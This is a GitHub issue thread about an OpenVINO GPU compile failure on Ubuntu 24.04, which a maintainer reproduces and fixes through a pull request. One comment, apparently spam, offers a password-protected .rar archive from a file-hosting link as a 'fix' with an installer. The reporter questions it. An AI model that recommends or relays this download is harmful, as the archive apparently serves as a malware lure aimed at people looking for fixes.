### ISSUE TITLE
 Unable to get working OpenVINO GPU accelleration on Ubuntu 24.04, i5-1240p

### ISSUE THREAD

**Issue by 0312birdzhang** [openvinotoolkit/openvino#26259] opened 2024-08-27 14:07 UTC
As https://github.com/openvinotoolkit/openvino/issues/24797 closed, i reopened one

I have some problem, and i found some models can run on GPU(like hello_classification sample), some not.
When hardcode core.compile_model with GPU, some error occurs:
```
    ...
    compiled_model = core.compile_model(model, 'GPU')
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/data/myproject/.venv/lib/python3.12/site-packages/openvino/runtime/ie_api.py", line 543, in compile_model
    super().compile_model(model, device_name, {} if config is None else config),
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
RuntimeError: Exception from src/inference/src/cpp/core.cpp:104:
Exception from src/inference/src/dev/plugin.cpp:53:
Check 'false' failed at src/plugins/intel_gpu/src/plugin/program_builder.cpp:185:
[GPU] ProgramBuilder build failed!
Program build failed(0_part_15):
5:13882:2: error: use of undeclared identifier 'eltwise0_data0'
 FUSED_OPS_VEC;
 ^
5:12712:2: note: expanded from macro 'FUSED_OPS_VEC'
....
5:13893:2: error: use of undeclared identifier 'eltwise0_data0'
 FUSED_OPS_SCALAR;
 ^
5:12800:2: note: expanded from macro 'FUSED_OPS_SCALAR'
```

openvino version: 2024.3.0

_Originally posted by @0312birdzhang in https://github.com/openvinotoolkit/openvino/issues/24797#issuecomment-2308893859_

**Comment by KazySahab** [comment] 2024-08-27 14:52
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0312birdzhang** [comment] 2024-08-27 14:55
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

What's this?

**Comment by isanghao** [comment] 2024-08-28 09:41
Hello, if possible, could you share the model so that we can reproduce the issue from our end?

**Comment by 0312birdzhang** [comment] 2024-08-28 14:24
> Hello, if possible, could you share the model so that we can reproduce the issue from our end?

Yeah, sure. It's [openpilot's supercombox.onnx](https://github.com/commaai/openpilot/blob/master/selfdrive/modeld/models/supercombo.onnx), i wrote [a litte demo](https://github.com/0312birdzhang/op_ov_demo), you can test it.

**Comment by 0312birdzhang** [comment] 2024-08-31 08:45
@isanghao can you take a look it or do you have some suggestion?

**Comment by isanghao** [comment] 2024-09-02 01:26
Hi 0312birdzhang,

The issue was reproduced on our side. I guess this is happening because of the self-multiplication operation after convolution. If you can modify the model, could you replace it with single pow(square) operation? That would be the immediate workaround. I guess regular fix would take some more time.

**Comment by 0312birdzhang** [comment] 2024-09-02 07:06
I'm a newbie on it, this model is from comma.ai and they only open source the onnx model. If you mean just modify this model, can you point me more?

**Comment by isanghao** [comment] 2024-09-03 07:39
Hi @0312birdzhang 
I created PR to fix the issue: https://github.com/openvinotoolkit/openvino/pull/26381
You can build OpenVINO with the PR. Alternatively, you can wait for the PR to be merged and use the nightly build.

Could you help us to validate the fix?

**Comment by 0312birdzhang** [comment] 2024-09-03 08:12
Yes, sure, i'm building now

**Comment by 0312birdzhang** [comment] 2024-09-03 10:27
Yeah, than you very much❤️

**Closed** 2024-09-03 10:27 UTC
Labels: category: GPU
